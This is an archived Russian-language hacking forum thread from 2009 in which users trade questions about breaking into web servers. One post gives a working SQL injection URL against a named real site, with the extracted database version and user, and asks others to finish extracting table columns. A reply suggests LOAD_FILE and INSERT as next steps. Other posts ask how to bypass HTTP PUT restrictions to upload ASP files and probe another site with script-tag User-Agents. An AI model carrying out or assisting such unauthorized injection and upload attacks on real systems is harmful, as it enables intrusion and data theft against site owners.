ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.03.2009, 21:53
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
|
|
|
17.03.2009, 21:57
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от S[N]EP
а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
Нет ЭТО не уязвимость.
|
|
|
|
17.03.2009, 22:51
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Почему при заходе в http://video.antichat.ru с юзер агентом <script></script> и <?php?> (только с тегами script и пхп) выпадает 500 ошибко, как я понимаю 500 ошибку может быть вызывать и скрипт(не обязательно само по) который как то выпадает в зависимости от настроек, или это типа такая зашита?
Последний раз редактировалось PaCo; 17.03.2009 в 22:55..
|
|
|
|
17.03.2009, 23:44
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
|
|
|
|
18.03.2009, 01:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от S[N]EP
Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
нет, это значит, что в скрипте ошибка или просто слетели настройки, и функция mysql_connect() вызывается без параметров.
|
|
|
|
18.03.2009, 02:40
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Сообщение от _SEREGA_
Люди! Подскажите алгоритм взлома web сервака. Я начинающий в этом деле.но нескажу что полный ламер.Я знаю C++,немного html и жабаскрипт. Какие есть способы? помоему я слышал что можно двумя способами web взлом и ломать сервесы на сервере через порты.Мож ктонить расскажет или даст ссылку пожалуйста.
Способов миллиард. Поищи по ключ. фразам "MySQL Injection", "XSS", "PHP Include (локальный, удаленный)". Для начала. А потом я бы поучился metasploit'ом пользоваться. XSpider скачай, почитай про него... Все обсуждалось миллион раз. 
Последний раз редактировалось AARON; 18.03.2009 в 14:17..
|
|
|
|
18.03.2009, 03:19
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от AARON
XSpider скачай, почитай про него...
Не качай XSpider !! Тем более если хочешь чему нибудь научиться.
P.S.
Для начала почитай:
https://forum.antichat.ru/thread20140.html
https://forum.antichat.ru/thread43966.html
https://forum.antichat.ru/thread54355.html
https://forum.antichat.ru/thread56756.html
https://forum.antichat.ru/thread89082.html
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 18.03.2009 в 03:25..
|
|
|
|
18.03.2009, 10:35
|
|
Новичок
Регистрация: 14.03.2009
Сообщений: 4
Провел на форуме:
22048
Репутация:
6
|
|
hi there
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*
portbld-freebsd6.2
nbt@localhost
4.0.27
nbt
дальше не идет... не могу получить имена столбцов в таблице.
у кого получится, киньте в личку, как сделали...
Последний раз редактировалось lalala23; 18.03.2009 в 11:02..
|
|
|
|
18.03.2009, 10:54
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Привет
Вопрос по HTTP 1.1, а конкретно про метод PUT
Почему могу с почью PUT создать txt и не могу создать asp? можно ли это обойти другими методами (copy, move, unlock .....)?
второй вопрос. имеется файл web.config или xxx.asp. При COPY в txt - ошибка. Я так понемаю такая же причина что и в первом вопросе.
Есть ли какие мнения?
|
|
|
|
18.03.2009, 10:57
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
hi there
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*
portbld-freebsd6.2
nbt@localhost
4.0.27
nbt
дальше не идет...
у кого получится, киньте в личку, как сделали...
там я так смотрю очень права порезаны. остается подбор таблиц - 2 уже есть - выводятся при не правельном запросе. можно еще поиграться с INSERT, LOAD_FILE - но не думаю что из этого что либо получится - все из-за тех же прав.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1176359){kind=avatar}
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1176520){kind=avatar}
Линейный вид
